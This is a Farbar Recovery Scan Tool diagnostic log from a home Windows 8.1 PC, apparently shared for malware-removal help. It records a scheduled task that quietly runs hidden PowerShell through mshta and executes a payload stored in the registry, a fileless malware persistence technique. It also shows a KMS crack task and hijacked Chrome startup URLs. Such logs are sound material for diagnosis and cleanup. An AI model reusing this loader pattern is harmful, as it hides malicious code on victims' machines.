Error: (10/21/2020 07:45:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Steam Client Service service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.
Error: (10/21/2020 07:45:29 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Steam Client Service service to connect.
Windows Defender:
===================================
Date: 2020-10-18 17:42:29.074
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {4FFA7FDF-9D80-4665-BA2E-77A22296DD1B}
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2020-10-17 23:07:35.332
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {F5CF0A25-3F7F-4DFE-A2B7-CD922B8270D3}
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2020-10-17 20:22:25.412
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {5AC52251-24F3-4360-9AA3-F0699B4C56D5}
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2020-10-17 15:38:54.119
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {6367FC15-5410-4174-A9C4-4493178CD02C}
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2020-10-16 11:35:52.457
Description:
Windows Defender scan has been stopped before completion.
Scan ID: {D30BD636-C486-4F2F-BB7E-08A596807841}
Scan Type: Antimalware
Scan Parameters: Quick Scan
CodeIntegrity:
===================================
Date: 2020-10-22 20:18:44.800
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-10-19 17:34:41.461
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-10-17 20:21:46.429
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-10-16 11:32:31.824
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-10-10 11:17:25.481
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-10-03 11:56:22.058
Description:
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-09-25 10:31:30.946
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-09-24 23:51:46.727
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE16\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Memory info ===========================
BIOS: American Megatrends Inc. F6 08/03/2013
Motherboard: Gigabyte Technology Co., Ltd. Z87-HD3
Processor: Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz
Percentage of memory in use: 53%
Total physical RAM: 16271.11 MB
Available physical RAM: 7532.8 MB
Total Virtual: 32655.11 MB
Available Virtual: 21352 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:232.54 GB) (Free:49.06 GB) NTFS
Drive d: (Data) (Fixed) (Total:931.51 GB) (Free:365.51 GB) NTFS
\\?\Volume{eb0d191b-1087-11e6-8250-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.34 GB) (Free:0.06 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 92BC3579)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.5 GB) - (Type=07 NTFS)
==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 28A9940F)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================
FRST
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-10-2020
Ran by Tomika (administrator) on TOM (Gigabyte Technology Co., Ltd. Z87-HD3) (23-10-2020 10:44:48)
Running from C:\Users\Tomika\Desktop
Loaded Profiles: Tomika
Platform: Windows 8.1 Pro (Update) (X64) Language: English (United Kingdom)
Default browser: Chrome
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(A FOUR TECH CO., LTD. -> ) C:\Program Files (x86)\Bloody7\Bloody7\Bloody7.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated -> Adobe Systems Inc.) D:\Programy\Adobe\Acrobat\Acrobat\acrotray.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Autodesk, Inc -> Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(Cole Williams Software Limited -> ) C:\Windows\SysWOW64\Codecs\TrayMenu.exe
(CrypKey (Canada) Ltd.) [File not signed] C:\Windows\System32\Crypserv.exe
(Epic Games Inc. -> Epic Games, Inc.) D:\Programy\Epic Games\Launcher\Engine\Binaries\Win64\UnrealCEFSubProcess.exe
(Epic Games Inc. -> Epic Games, Inc.) D:\Programy\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(Even Balance, Inc. -> ) C:\Windows\SysWOW64\PnkBstrA.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <50>
(Intel(R) pGFX -> ) C:\Windows\System32\igfxTray.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Driver Booster\7.2.0\Pub\PreCare.exe
(Manhattan Engineering Incorporated -> Kite) C:\Program Files\Kite\kited.exe
(Manhattan Engineering Incorporated -> Kite) C:\Program Files\Kite\KiteService.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Oxygen Cloud Inc. -> ) C:\Users\Tomika\.odrive\bin\6729\odriveapp.exe
(Oxygen Cloud Inc. -> odrive) C:\Users\Tomika\.odrive\bin\6729\odrive.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Samsung Electronics Co., Ltd. -> Samsung Electronics Co. Ltd.) C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe
(Stichting Blender Foundation -> Blender Foundation) C:\Program Files\Blender Foundation\Blender 2.90\blender.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) D:\Programy\TeamViewer\TeamViewer_Service.exe
(Wacom Technology Corp. -> Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(Wondershare software CO., LIMITED -> Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppService.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [1893496 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-03-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [WindowsDefender] => "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [File not signed]
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [711616 2016-04-19] (Autodesk, Inc -> Autodesk, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => D:\Programy\Adobe\Acrobat\Acrobat\Acrotray.exe [3499896 2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-10-12] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [Codec Settings UAC Manager] => C:\Windows\SysWOW64\Codecs\CodecUACManager.exe [66192 2018-03-20] (Cole Williams Software Limited -> )
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [GalaxyClient] => [X]
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [EpicGamesLauncher] => D:\Programy\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32546704 2020-10-23] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [91701608 2020-07-30] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Bloody2] => C:\Program Files (x86)\Bloody7\Bloody7\Bloody7.exe [19841264 2020-02-13] (A FOUR TECH CO., LTD. -> )
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Kite] => C:\Program Files\Kite\kited.exe [625822184 2020-10-14] (Manhattan Engineering Incorporated -> Kite)
HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\Windows\system32\AdobePDF.dll [55432 2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe [2020-10-21] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk [2018-06-11]
ShortcutTarget: CodecPackTrayMenu.lnk -> C:\Windows\SysWOW64\Codecs\TrayMenu.exe (Cole Williams Software Limited -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\odrive.lnk [2017-07-27]
ShortcutTarget: odrive.lnk -> C:\Program Files\odrive\odrive.exe (Oxygen Cloud, Inc -> ) [File not signed]
GroupPolicy: Restriction - Chrome <==== ATTENTION
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0291BC3E-5758-4AE0-B583-887997C4F7E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {08667DDA-529A-4AE5-B93A-F3FB2AFB6863} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [862 2019-04-30] () [File not signed]
Task: {14E9279D-E202-421D-9345-9FF6FF65892A} - System32\Tasks\AutoKMS => D:\Programy\MS Office\KMS_tooltip_crack\AutoKMS.exe
Task: {19B48E07-EF07-43C1-89F3-DC0C7BE14F95} - System32\Tasks\CCleanerSkipUAC => D:\Programy\CCleaner\CCleaner.exe [26588344 2020-09-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {240525CC-07E9-4C0E-BF92-7FD8CBC01AAC} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\Scheduler.exe [149776 2019-11-14] (IObit Information Technology -> IObit)
Task: {2AE7DBC0-9D7B-4633-9F38-EA13D59FFC97} - \Movie\Movie task -> No File <==== ATTENTION
Task: {2C5BAA6C-22CE-4023-8CD3-920F648F948D} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [436856 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {3B6DA161-FF75-4709-9698-E8B4D4E29F7A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {521E2DEE-AF47-458B-BE39-05E41D7000C3} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe [1112576 2017-05-19] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co. Ltd.)
Task: {56E7C739-D87C-4968-A298-0FA8DD870A67} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {57E8FD86-D77A-4957-AF8A-185FF714EF38} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {5DFEF0DB-1EC0-4858-9DE9-295F0928B552} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {5FBDD006-E7EF-4EB4-B15F-E75C13219037} - System32\Tasks\SystemSettings => mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -WindowStyle hidden -ep bypass -nop -c $e=(Get-ItemProperty HKLM:\Software\WOW6432Node\a);Select-Object -ExpandProperty Shell;Invoke-Expression $e",0,True)(window.close)
Task: {67CAE894-9940-43DF-A154-A01C69C48B7F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {69904E5D-AA09-4F07-8269-73B550B28214} - System32\Tasks\JavaUpdateSched => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
Task: {7354C34F-FF87-4E86-89AB-F2B6844E5835} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [1693816 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {8116AA3D-F35E-4EE1-A65F-61E452CB28B9} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_445_pepper.exe [1497656 2020-10-13] (Adobe Inc. -> Adobe)
Task: {8623AE83-BCCD-4DB0-BE84-45A87C9A0D5E} - System32\Tasks\CCleaner Update => D:\Programy\CCleaner\CCUpdate.exe [686384 2020-09-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {AF11B0C8-2370-4BF1-A148-2AC2A2B5F4A3} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [649336 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {B669C2DF-0043-43E2-BD6E-2B93975B0C19} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {BBB840E0-DF47-4533-842A-614A9FB55DB2} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {C5600166-0D00-436C-9597-BB2E48267804} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-10-13] (Adobe Inc. -> Adobe)
Task: {D9E3F3C1-96EA-408C-93C5-EAB8CC220326} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [728184 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E3339F51-E6A0-4320-BFB4-20947A367484} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-2643689781-145595849-2857803826-1001 => C:\Users\Tomika\AppData\Local\MEGAsync\MEGAupdater.exe [615160 2019-04-14] (Mega Limited -> Mega Limited)
Task: {E43C15E6-6414-4ACA-846C-D124676E2AD8} - System32\Tasks\Driver Booster SkipUAC (Tomika) => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\DriverBooster.exe [7749904 2019-12-19] (IObit Information Technology -> IObit)
Task: {E83C055E-EA00-442C-83F5-A1DF6B84C917} - System32\Tasks\Driver Booster Update => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\AutoUpdate.exe [2361104 2019-12-18] (IObit Information Technology -> IObit)
Task: {EDF106E5-69AB-49FB-9A36-0AF6F148BFCB} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [728184 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FA8EF300-7063-437D-9ECE-A3820122D686} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [649336 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FB2E7073-3061-4C88-848B-30215EF82E06} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [946296 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.81.1 213.46.172.38 213.46.172.39
Tcpip\..\Interfaces\{1F7EB040-CEB2-48F8-A98A-A024DE0DE62A}: [DhcpNameServer] 192.168.81.1 213.46.172.38 213.46.172.39
Edge:
======
Edge Profile: C:\Users\Tomika\AppData\Local\Microsoft\Edge\User Data\Default [2020-07-01]
FireFox:
========
FF DefaultProfile: 006jgses.default
FF ProfilePath: C:\Users\Tomika\AppData\Roaming\Mozilla\Firefox\Profiles\006jgses.default [2020-10-21]
FF Session Restore: Mozilla\Firefox\Profiles\006jgses.default -> is enabled.
FF Extension: (AdBlocker Ultimate) - C:\Users\Tomika\AppData\Roaming\Mozilla\Firefox\Profiles\006jgses.default\Extensions\adblockultimate@adblockultimate.net.xpi [2020-10-20]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCFirefoxExtn [2017-01-04] [Legacy] [not signed]
FF Plugin: @java.com/DTPlugin,version=13.0.1.0 -> C:\Program Files\Java\jre-10.0.1\bin\dtplugin\npDeployJava1.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=13.0.1.0 -> C:\Program Files\Java\jre-10.0.1\bin\plugin2\npjp2.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-12] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2019-02-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @wolfram.com/Mathematica -> C:\Program Files (x86)\Common Files\Wolfram Research\Browser\11.0.1.5597552\npmathplugin.dll [2016-09-21] (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FF Plugin-x32: Adobe Acrobat -> D:\Programy\Adobe\Acrobat\Acrobat\Air\nppdf32.dll [2014-08-05] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-12] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [No File]
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default [2020-10-23]
CHR Notifications: Default -> hxxps://calendar.google.com; hxxps://web.skype.com; hxxps://www.messenger.com
CHR HomePage: Default -> hxxp://www.seznam.cz/?clid=13415
CHR StartupUrls: Default -> "hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRa0T-NJ1bNV5iGB7j76kR7EOZGkeQkbUBtqSnxy0q4qOqRPdLMQ5814Ip_0Bcs96ceKxOJ3yAx3ac2A20wh1BTmHSKoac3d5DU0PKrFavIAzFxl1cPGixbg440pQsLkCnd8sKH-Ln2Ju87vPmwn5rVbntl2zC3PO29IJVaQ5afAlJNtFeJI,","hxxp://www.google.com/","hxxp://d2ucfwpxlh3zh3 ... mode=loadm"
CHR NewTab: Default -> Active:"chrome-extension://jpfpebmajhhopeonhlcgidhclcccjcik/newtab.html"
CHR Session Restore: Default -> is enabled.
CHR Extension: (Flash Video Downloader) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\aiimdkdngfcipjohbjenkahhlhccpdbc [2020-10-09]
CHR Extension: (ColorZilla) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhlhnicpbhignbdhedgjhgdocnmhomnp [2019-04-02]
CHR Extension: (Mendeley Web Importer) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\dagcmkpagjlhakfdhnbomgmjdpkdklff [2020-10-09]
CHR Extension: (Adobe Acrobat) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-09-16]
CHR Extension: (Video Downloader professional) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\elicpjhcidhpjomhibiffojpinpmmpil [2020-07-26]
CHR Extension: (News Feed Eradicator for Facebook) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjcldmjmjhkklehbacihaiopjklihlgg [2020-10-21]
CHR Extension: (Vysor) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gidgenkbbabolejbgbpnhbimgjbffefm [2020-09-04]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2020-10-16]
